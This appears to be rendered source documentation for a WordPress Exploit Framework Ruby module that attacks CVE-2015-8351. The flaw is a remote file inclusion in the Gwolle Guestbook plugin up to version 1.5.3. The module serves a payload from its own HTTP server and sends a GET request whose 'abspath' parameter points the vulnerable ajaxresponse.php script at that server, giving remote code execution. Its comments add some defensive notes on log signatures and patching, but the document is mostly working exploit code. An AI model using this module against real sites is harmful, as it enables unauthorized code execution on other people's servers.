class Wpxf::Exploit::GwolleGuestbookRemoteFileInclusion
Public Class Methods
new()
Calls superclass method
Wpxf::Net::HttpServer::new
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 7
# Sets up the module: calls the superclass initializer, records the module
# metadata (name, description, authors, references, disclosure date) and
# registers the two options the module needs.
#
# Defensive note: per the description below, affected installs are Gwolle
# Guestbook 1.5.3 and earlier, and the issue is only reachable when PHP's
# "allow_url_include" is enabled (it is disabled by default). The references
# are CVE-2015-8351 and EDB 38861.
def initialize
  super

  summary = 'The Gwolle Guestbook plugin, in versions 1.5.3 and below, '\
            'allows for remote file inclusion and remote code execution. '\
            'This exploit only works when the PHP option "allow_url_include" '\
            'is enabled (disabled by default).'

  credits = [
    'High-Tech Bridge Security Research Lab', # Vulnerability disclosure
    'rastating'                               # WPXF module
  ]

  module_info = {
    name: 'Gwolle Guestbook Remote File Inclusion',
    desc: summary,
    author: credits,
    references: [
      ['CVE', '2015-8351'],
      ['EDB', '38861']
    ],
    date: 'Nov 04 2015'
  }
  update_info(**module_info)

  # Address the module's own HTTP server is reachable on; required, no default.
  host_option = StringOption.new(
    name: 'rfi_host',
    desc: 'The address of the host listening for a connection',
    required: true
  )

  # Path component of the URL built by rfi_url; the default is produced by
  # Utility::Text.rand_alpha(8) each time the module is constructed.
  path_option = StringOption.new(
    name: 'rfi_path',
    desc: 'The path to access via the remote file inclusion request',
    default: Utility::Text.rand_alpha(8),
    required: true
  )

  register_options([host_option, path_option])
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 46
# Version check for the 'gwolle-gb' plugin, delegated to
# check_plugin_version_from_readme.
#
# NOTE(review): '1.5.4' looks like the first fixed release (the module
# description says 1.5.3 and below are affected); confirm against the helper's
# contract. Administrators can use the same threshold when auditing installs.
def check
  plugin_slug = 'gwolle-gb'
  version_threshold = '1.5.4'
  check_plugin_version_from_readme(plugin_slug, version_threshold)
end
on_http_request(path, params, headers)
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 62
# HTTP request callback; presumably invoked by the Wpxf::Net::HttpServer
# superclass for each incoming request (TODO confirm).
#
# The three arguments are accepted but never read: every request receives the
# same body, whatever path, parameters or headers it carries.
#
# @param path [Object] unused
# @param params [Object] unused
# @param headers [Object] unused
# @return the value of payload.encoded
def on_http_request(path, params, headers)
  response_body = payload.encoded
  response_body
end
plugin_url()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 42
# Base URL of the plugin: the 'gwolle-gb' directory joined onto
# wordpress_url_plugins via normalize_uri.
def plugin_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'gwolle-gb')
end
rfi_host()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 50
# Value of the 'rfi_host' option as returned by normalized_option_value.
def rfi_host
  option_name = 'rfi_host'
  normalized_option_value(option_name)
end
rfi_path()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 54
# Value of the 'rfi_path' option as returned by normalized_option_value.
def rfi_path
  option_name = 'rfi_path'
  normalized_option_value(option_name)
end
rfi_url()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 58
# Builds the plain-HTTP URL that points at the module's own HTTP server:
# rfi_host, the server's bind port, then rfi_path.
#
# @return [String] "http://<rfi_host>:<http_server_bind_port>/<rfi_path>"
def rfi_url
  host = rfi_host
  port = http_server_bind_port
  resource = rfi_path
  "http://#{host}:#{port}/#{resource}"
end
run()
Calls superclass method
Wpxf::Module#run
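# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 70
# Starts the module's HTTP server, sends one GET request to vulnerable_url
# with the `abspath` parameter set to rfi_url, stops the server and reports
# the response.
#
# Defensive note: in web server logs this appears as a request to
# .../gwolle-gb/frontend/captcha/ajaxresponse.php whose `abspath` value is an
# http:// URL. Upgrading the plugin past 1.5.3 and leaving PHP's
# allow_url_include disabled (its default) both close the issue.
#
# @return [Boolean] false when the superclass run fails, when no response
#   object comes back, or when the response body mentions allow_url_include;
#   true otherwise
def run
  return false unless super

  start_http_server(true)
  begin
    emit_info 'Executing request...'
    res = execute_get_request(
      url: vulnerable_url,
      params: { 'abspath' => rfi_url }
    )
  ensure
    # Stop the listener even if the request raises, so it never stays bound.
    stop_http_server
  end

  # The original read res.code and res.body before its own `res &&` check;
  # guard once, up front, instead of raising NoMethodError on nil.
  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{res.body}", true

  # A body that names the PHP setting is treated as the include having been refused.
  if res.body =~ /allow_url_include/
    emit_error 'allow_url_include appears to be disabled'
    return false
  end

  emit_success "Result: #{res.body}" unless res.body.strip.empty?

  true
end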
vulnerable_url()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 66
# URL of the plugin script the module requests:
# <plugin_url>/frontend/captcha/ajaxresponse.php, joined with normalize_uri.
#
# Defensive note: this path is the one to look for when reviewing access logs
# or writing a web application firewall rule for CVE-2015-8351.
def vulnerable_url
  script_segments = %w[frontend captcha ajaxresponse.php]
  normalize_uri(plugin_url, *script_segments)
end